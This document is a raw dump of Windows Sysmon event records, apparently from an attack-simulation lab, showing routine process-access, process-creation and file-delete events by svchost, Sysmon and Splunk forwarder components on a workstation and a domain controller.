11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1762-6216-0A05-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1762-6216-0A05-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.862{4F8D34B0-1762-6216-0A05-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.549{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD0D9999D0A72D23BC28AA1BF2C2DA67,SHA256=2B5EA191DAA135C2E6492155272C9B3C226313723BB1638B3D11E2352140334B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E489CD284888309DABCFF6EC54628A3,SHA256=FD031BE2782370034F8FC0A38F34B6862CBEC97E105E8CEF9DB302E1A2B76152,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=522DEB946F53EA8AF7FA59F05B4CDBF5,SHA256=73349AE95C7282EA38D67CB146826FBA4C3A19CDFF5A2E18B7D6E79B5792777B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.909{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.908{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.908{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.908{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.908{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.908{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 